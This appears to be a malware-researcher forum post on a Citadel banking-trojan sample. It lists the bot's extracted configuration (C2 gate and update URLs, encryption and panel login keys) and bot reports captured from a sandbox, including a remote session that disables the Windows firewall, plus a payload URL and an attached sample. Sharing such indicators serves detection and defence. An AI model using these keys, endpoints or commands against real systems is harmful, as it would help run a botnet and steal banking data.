Citadel targeting wellsfargo
haha:
Drop: hxtp://fragmentationclicked.net/ma/so/gate.php
Update: hxtp://fragmentationclicked.net/ma/so/file.php|file=soft.exe
Key: BC 9D 3E 27 85 9B 87 13 3A 5C E9 4C 73 2D 79 54
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
================================================================================
bot_id=MCAFEE-7BEE0E38_7875768FA3627FE2
botnet=CIT
bot_version=1.3.5.1
ipv4=122.164.254.109
country=??
type=1
rtime=06:03:54 05.11.2013
time_system=06:03:26 05.11.2013
time_tick=00:48:07
time_localbias=+0:00
os_version=XP, SP 3
language_id=1033
process_name=C:\WINDOWS\Explorer.EXE
process_info=Microsoft Corporation | Microsoft® Windows® Operating System | 6.00.2900.5512
process_user=MCAFEE-7BEE0E38\Administrator
path_source=
context=
Wininet(Internet Explorer) cookies:
Path: wiki.wireshark.org/
__utma=44101410.1372036583.1345021049.1345021049.1345021049.1
__utmb=44101410.1.10.1345021049
__utmz=44101410.1345021049.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
================================================================================
bot_id=MCAFEE-7BEE0E38_7875768FA3627FE2
botnet=CIT
bot_version=1.3.5.1
ipv4=122.164.254.109
country=??
type=400
rtime=06:06:55 05.11.2013
time_system=06:03:27 05.11.2013
time_tick=00:48:07
time_localbias=+0:00
os_version=XP, SP 3
language_id=1033
process_name=C:\WINDOWS\Explorer.EXE
process_info=Microsoft Corporation | Microsoft® Windows® Operating System | 6.00.2900.5512
process_user=MCAFEE-7BEE0E38\Administrator
path_source=
context=
1: Microsoft Corporation | Microsoft Office Enterprise 2007 | 12.0.4518.1014
2: Microsoft Corporation | Update for Windows XP (KB898461) | 1
3: Microsoft Corporation | Hotfix for Windows XP (KB942288-v3) | 3
4: Microsoft Corporation | Hotfix for Windows XP (KB954550-v5) | 5
5: Microsoft Corporation | Microsoft .NET Framework 3.5 SP1 | Unknown
6: David Zimmer | SysAnalyzer 1.0 | Unknown
7: CACE Technologies | WinPcap 4.1.1 | 4.1.0.1753
8: Unknown | WinRAR archiver | Unknown
9: The Wireshark developer community, http://www.wireshark.org | Wireshark 1.2.9 | 1.2.9
10: Safer Networking Limited | FileAlyzer | 1.6.0.4
11: Microsoft Corporation | WebFldrs XP | 9.50.7523
12: Microsoft Corporation | Microsoft Software Update for Web Folders (English) 12 | 12.0.4518.1014
13: Microsoft Corporation | Microsoft Office Access MUI (English) 2007 | 12.0.4518.1014
14: Microsoft Corporation | Microsoft Office Excel MUI (English) 2007 | 12.0.4518.1014
15: Microsoft Corporation | Microsoft Office PowerPoint MUI (English) 2007 | 12.0.4518.1014
16: Microsoft Corporation | Microsoft Office Publisher MUI (English) 2007 | 12.0.4518.1014
17: Microsoft Corporation | Microsoft Office Outlook MUI (English) 2007 | 12.0.4518.1014
18: Microsoft Corporation | Microsoft Office Word MUI (English) 2007 | 12.0.4518.1014
19: Microsoft Corporation | Microsoft Office Proof (English) 2007 | 12.0.4518.1014
20: Microsoft Corporation | Microsoft Office Proof (French) 2007 | 12.0.4518.1014
21: Microsoft Corporation | Microsoft Office Proof (Spanish) 2007 | 12.0.4518.1014
22: Microsoft Corporation | Microsoft Office Proofing (English) 2007 | 12.0.4518.1014
23: Microsoft Corporation | Microsoft Office Enterprise 2007 | 12.0.4518.1014
24: Microsoft Corporation | Microsoft Office InfoPath MUI (English) 2007 | 12.0.4518.1014
25: Microsoft Corporation | Microsoft Office Shared MUI (English) 2007 | 12.0.4518.1014
26: Microsoft Corporation | Microsoft Office OneNote MUI (English) 2007 | 12.0.4518.1014
27: Microsoft Corporation | Microsoft Office Groove MUI (English) 2007 | 12.0.4518.1014
28: Microsoft Corporation | Microsoft Office Groove Setup Metadata MUI (English) 2007 | 12.0.4518.1014
29: Microsoft Corporation | Microsoft Office Shared Setup Metadata MUI (English) 2007 | 12.0.4518.1014
30: Microsoft Corporation | Microsoft Office Access Setup Metadata MUI (English) 2007 | 12.0.4518.1014
31: Microsoft Corporation | Microsoft .NET Framework 3.0 Service Pack 2 | 3.2.30729
32: Microsoft Corporation | Microsoft .NET Framework 2.0 Service Pack 2 | 2.2.30729
33: Microsoft Corporation | Microsoft .NET Framework 3.5 SP1 | 3.5.30729
34: Microsoft Corporation | Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595) | 1
35: VMware, Inc. | VMware Tools | 8.4.5.14951
================================================================================
bot_id=MCAFEE-7BEE0E38_7875768FA3627FE2
botnet=CIT
bot_version=1.3.5.1
ipv4=122.164.254.109
country=??
type=402
rtime=06:06:55 05.11.2013
time_system=06:03:27 05.11.2013
time_tick=00:48:08
time_localbias=+0:00
os_version=XP, SP 3
language_id=1033
process_name=C:\WINDOWS\Explorer.EXE
process_info=Microsoft Corporation | Microsoft® Windows® Operating System | 6.00.2900.5512
process_user=MCAFEE-7BEE0E38\Administrator
path_source=
context=
Company: Unknown
Product: Unknown
Version: Unknown
================================================================================
bot_id=MCAFEE-7BEE0E38_7875768FA3627FE2
botnet=CIT
bot_version=1.3.5.1
ipv4=122.164.254.109
country=??
type=401
rtime=06:06:56 05.11.2013
time_system=06:03:27 05.11.2013
time_tick=00:48:08
time_localbias=+0:00
os_version=XP, SP 3
language_id=1033
process_name=C:\WINDOWS\Explorer.EXE
process_info=Microsoft Corporation | Microsoft® Windows® Operating System | 6.00.2900.5512
process_user=MCAFEE-7BEE0E38\Administrator
path_source=
context=
Company: Unknown
Product: Unknown
Version: Unknown
================================================================================
bot_id=MCAFEE-7BEE0E38_7875768FA3627FE2
botnet=CIT
bot_version=1.3.5.1
ipv4=122.164.254.109
country=??
type=300
rtime=06:06:56 05.11.2013
time_system=06:03:42 05.11.2013
time_tick=00:48:22
time_localbias=+0:00
os_version=XP, SP 3
language_id=1033
process_name=C:\WINDOWS\Explorer.EXE
process_info=Microsoft Corporation | Microsoft® Windows® Operating System | 6.00.2900.5512
process_user=MCAFEE-7BEE0E38\Administrator
path_source=
context=
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator>
C:\Documents and Settings\Administrator>prompt $Q$Q$Q$Q$Q$Q$Q$Q$Q$Q[ $P ]$G
==========[ C:\Documents and Settings\Administrator ]>hostname
mcafee-7bee0e38
==========[ C:\Documents and Settings\Administrator ]>tasklist
Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         16 K
System                         4 Console                 0        212 K
smss.exe                     556 Console                 0        372 K
csrss.exe                    616 Console                 0      4,568 K
winlogon.exe                 640 Console                 0     11,140 K
services.exe                 684 Console                 0      8,016 K
lsass.exe                    696 Console                 0      1,780 K
vmacthlp.exe                 852 Console                 0      2,368 K
svchost.exe                  896 Console                 0      4,856 K
svchost.exe                  976 Console                 0      4,364 K
svchost.exe                 1076 Console                 0     23,952 K
svchost.exe                 1132 Console                 0      3,388 K
svchost.exe                 1228 Console                 0      4,304 K
explorer.exe                1508 Console                 0     15,812 K
spoolsv.exe                 1564 Console                 0      7,492 K
VMwareTray.exe              1972 Console                 0      5,848 K
VMwareUser.exe              1984 Console                 0     13,732 K
vmtoolsd.exe                1776 Console                 0      9,028 K
VMUpgradeHelper.exe         2028 Console                 0      3,884 K
TPAutoConnSvc.exe            480 Console                 0      3,976 K
alg.exe                     1412 Console                 0      3,420 K
wscntfy.exe                 1700 Console                 0      6,340 K
TPAutoConnect.exe           1740 Console                 0      8,260 K
wuauclt.exe                  864 Console                 0      8,540 K
ctfmon.exe                  1152 Console                 0      7,144 K
mscorsvw.exe                2476 Console                 0      3,868 K
wireshark.exe               3468 Console                 0     11,696 K
procexp.exe                 3440 Console                 0     11,796 K
dumpcap.exe                 1600 Console                 0      8,748 K
sysAnalyzer.exe             3876 Console                 0     11,136 K
regshot.exe                 3944 Console                 0     34,092 K
msiexec.exe                 3624 Console                 0     16,632 K
wuauclt.exe                  816 Console                 0      6,548 K
EXCEL.EXE                    848 Console                 0     27,040 K
rundll32.exe                2884 Console                 0      7,672 K
cmd.exe                      336 Console                 0      3,800 K
tasklist.exe                3548 Console                 0      7,796 K
wmiprvse.exe                2148 Console                 0      5,540 K
==========[ C:\Documents and Settings\Administrator ]>ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : mcafee-7bee0e38
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : localdomain
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
Physical Address. . . . . . . . . : 00-0C-29-78-26-70
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 192.168.182.128
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.182.2
DHCP Server . . . . . . . . . . . : 192.168.182.254
DNS Servers . . . . . . . . . . . : 192.168.182.2
Primary WINS Server . . . . . . . : 192.168.182.2
Lease Obtained. . . . . . . . . . : Tuesday, November 05, 2013 11:30:49 AM
Lease Expires . . . . . . . . . . : Tuesday, November 05, 2013 12:00:49 PM
==========[ C:\Documents and Settings\Administrator ]>netsh firewall set opmode disable
Ok.
==========[ C:\Documents and Settings\Administrator ]>
==========[ C:\Documents and Settings\Administrator ]>exit
https://zeustracker.abuse.ch/monitor.ph ... licked.net
htxp://46.183.220.124/demi/web.exe
https://www.virustotal.com/en/file/ec4fa711aa76c8ae7a218481c39f425a4aac86fe34c4fdceabc86596e1c6d592/analysis/1383824478/
Attachments
infected
(5.8 KiB) Downloaded 52 times